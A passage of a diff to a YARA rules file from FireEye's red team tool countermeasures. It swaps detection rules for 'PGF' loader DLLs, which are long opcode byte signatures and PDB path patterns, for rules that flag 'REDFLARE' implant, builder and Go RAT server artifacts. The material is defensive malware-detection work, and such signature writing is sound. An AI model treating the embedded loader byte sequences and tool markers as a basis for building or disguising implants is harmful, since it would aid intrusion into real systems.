C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 87 F9 FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 CB 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 37 FC 00 00 48 89 D8 48 89 C1 E8 4C AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 9A 9C 01 00 48 89 D8 48 89 C1 E8 2F AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 }
-		$cond2 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 ?? ?? ?? ?? FF D0 48 89 C1 48 8D 85 ?? ?? ?? ?? 41 B8 04 01 00 00 48 89 C2 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 4D ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 89 C2 B9 08 00 00 00 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? 00 75 ?? BB 00 00 00 00 E9 ?? ?? ?? ?? 48 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 38 04 00 00 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 48 8D 85 ?? ?? ?? ?? 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 41 B8 00 00 00 00 48 89 C1 E8 ?? ?? ?? ?? 48 83 F8 FF 0F 95 C0 84 C0 74 ?? 48 8B 85 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 89 45 ?? EB ?? 48 8B 45 ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? BB 00 00 00 00 E9 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 45 ?? 48 89 E8 48 89 45 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 C7 45 ?? 00 00 00 00 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? 48 39 C2 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 39 45 ?? 73 ?? 48 8B 45 ?? 48 8B 00 48 8B 55 ?? 48 81 C2 00 10 00 00 48 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 39 45 ?? 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 8B 4D ?? 48 8B 55 ?? 48 01 CA 48 39 D0 0F 83 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 8B 45 ?? 48 8B 00 48 8D 95 ?? ?? ?? ?? 41 B8 30 00 00 00 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 48 8B 45 ?? 48 8B 00 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB 00 00 00 00 EB ?? 90 EB ?? 90 48 83 45 ?? 08 E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 45 ?? 48 8B 45 ?? 8B 40 ?? 48 63 D0 48 8B 45 ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? 8B 40 ?? 89 C2 48 8B 45 ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB 01 00 00 00 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB 01 EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 28 07 00 00 5B 5D C3 }
-		$cond3 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 C1 7C 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 33 B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 B2 FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 75 96 01 00 48 8D 45 AF 48 89 C1 E8 B9 FE 00 00 48 8B 05 66 7C 06 00 FF D0 89 C2 B9 08 00 00 00 E8 3C B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 83 B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 2A F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 28 B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 69 7B 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 11 B9 05 00 48 8B 05 A2 7B 06 00 FF D0 48 8D 15 0D B9 05 00 48 89 C1 48 8B 05 97 7B 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 5A 7B 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 22 7B 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 59 FB FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 00 FB FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 94 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 00 FC 00 00 48 89 D8 48 89 C1 E8 45 AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 63 9C 01 00 48 89 D8 48 89 C1 E8 28 AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 }
-		$cond4 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 D3 8B 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 65 B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 EC FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 AF 96 01 00 48 8D 45 AF 48 89 C1 E8 F3 FE 00 00 48 8B 05 78 8B 06 00 FF D0 89 C2 B9 08 00 00 00 E8 6E B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 B5 B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 64 F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 5A B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 73 8A 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 45 C8 05 00 48 8B 05 B4 8A 06 00 FF D0 48 8D 15 41 C8 05 00 48 89 C1 48 8B 05 A9 8A 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 6C 8A 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 54 8A 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 33 FA FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 DA F9 FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 CE 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 3A FC 00 00 48 89 D8 48 89 C1 E8 4F AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 9D 9C 01 00 48 89 D8 48 89 C1 E8 32 AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 }
+		$1 = "/RedFlare/gorat_server"
+		$2 = "RedFlare/sandals"
+		$3 = "goratsvr.CommandResponse" fullword
+		$4 = "goratsvr.CommandRequest" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and any of them
+		( uint32( 0 ) == 0x464c457f ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win_PGF_1 : FILE
+rule FIREEYE_RT_APT_Builder_PY_REDFLARE_1
 {
 	meta:
-		description = "PDB string used in some PGF DLL samples"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "14e2102c-3572-5314-999c-ff3f6c94de03"
-		date = "2020-12-08"
-		modified = "2024-03-04"
+		id = "3b5ad25d-ce66-572e-9a91-40a73b8fd447"
+		date = "2020-11-27"
+		date = "2020-11-27"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win_PGF_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Builder_PY_REDFLARE_1.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "013c7708f1343d684e3571453261b586"
-		logic_hash = "9dede268d33a38e980026917bd01bc47a72bfe60ba4a999c91eb727a2f377462"
+		hash = "d0a830403e56ebaa4bfbe87dbfdee44f"
+		logic_hash = "1948cadb7242eb69bffbc222802ce9c1af38d7a846da09b6343b1449fe054e42"
 		score = 75
-		quality = 48
-		tags = "FILE"
-		rev = 6
+		quality = 75
+		tags = ""
+		rev = 1
 
 	strings:
-		$pdb1 = /RSDS[\x00-\xFF]{20}c:\\source\\dllconfig-master\\dllsource[\x00-\xFF]{0,500}\.pdb\x00/ nocase
-		$pdb2 = /RSDS[\x00-\xFF]{20}C:\\Users\\Developer\\Source[\x00-\xFF]{0,500}\\Release\\DllSource\.pdb\x00/ nocase
-		$pdb3 = /RSDS[\x00-\xFF]{20}q:\\objchk_win7_amd64\\amd64\\init\.pdb\x00/ nocase
+		$1 = "LOAD_OFFSET_32 = 0x612"
+		$2 = "LOAD_OFFSET_64 = 0x611"
+		$3 = "class RC4:"
+		$4 = "struct.pack('<Q' if is64b else '<L'"
+		$5 = "stagerConfig['comms']['config']"
+		$6 = "_x86.dll"
+		$7 = "_x64.dll"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize < 15MB and any of them
+		all of them and @1 [ 1 ] < @2 [ 1 ] and @2 [ 1 ] < @3 [ 1 ] and @3 [ 1 ] < @4 [ 1 ] and @4 [ 1 ] < @5 [ 1 ]
 }
-rule FIREEYE_RT_APT_Loader_Win32_PGF_3 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_8 : FILE
 {
 	meta:
-		description = "PGF payload, generated rule based on symfunc/c02594972dbab6d489b46c5dee059e66. Identifies dllmain_hook x86 payloads."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "adf91482-6e04-5d11-bc00-4b1c7a802c49"
-		date = "2020-12-08"
+		id = "b090df60-8f4e-51ca-944c-6f9ce2d9c913"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_3.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_8.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4414953fa397a41156f6fa4f9462d207"
-		logic_hash = "24d2caad1d740ccbff0cf111a05ecad20ed06f311d530d8de86050d916da32ce"
+		hash = "9c8eb908b8c1cda46e844c24f65d9370, 9e85713d615bda23785faf660c1b872c"
+		logic_hash = "5b8a0402886daebefb995e7df0877d51727c5b8dc58eeb8ff16ceec5e7811a20"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 1
 
 	strings:
-		$cond1 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF 90 EE 01 6D C7 85 30 F9 FF FF 6C FE 01 6D 8D 85 34 F9 FF FF 89 28 BA CC 19 00 6D 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 BB A6 00 00 A1 48 A1 05 6D C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 B8 AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 56 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 DF B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 52 0B 01 00 A1 4C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 51 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 EF AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 82 FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 84 AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 2C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 0C 40 05 6D A1 5C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 18 40 05 6D 89 04 24 A1 60 A1 05 6D FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 54 A1 05 6D FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 9C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 00 6D 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 00 6D 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 5D BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 48 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 A0 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 FD BB 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 75 A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 76 A3 00 00 8D 65 F4 5B 5E 5F 5D C3 }
-		$cond2 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF B0 EF 3D 6A C7 85 30 F9 FF FF 8C FF 3D 6A 8D 85 34 F9 FF FF 89 28 BA F4 1A 3C 6A 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 B3 A6 00 00 A1 64 A1 41 6A C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 B0 AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 4E 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 D7 B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 4A 0B 01 00 A1 68 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 49 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 E7 AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 7A FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 7C AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 44 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 62 40 41 6A A1 78 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 6E 40 41 6A 89 04 24 A1 7C A1 41 6A FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 70 A1 41 6A FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 C8 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 3C 6A 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 3C 6A 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 55 BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 40 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 98 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 F5 BB 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 6D A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 6E A3 00 00 8D 65 F4 5B 5E 5F 5D C3 }
-		$cond3 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF F0 EF D5 63 C7 85 30 F9 FF FF CC FF D5 63 8D 85 34 F9 FF FF 89 28 BA 28 1B D4 63 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 BF A6 00 00 A1 64 A1 D9 63 C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 BC AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 5A 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 E3 B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 56 0B 01 00 A1 68 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 55 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 F3 AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 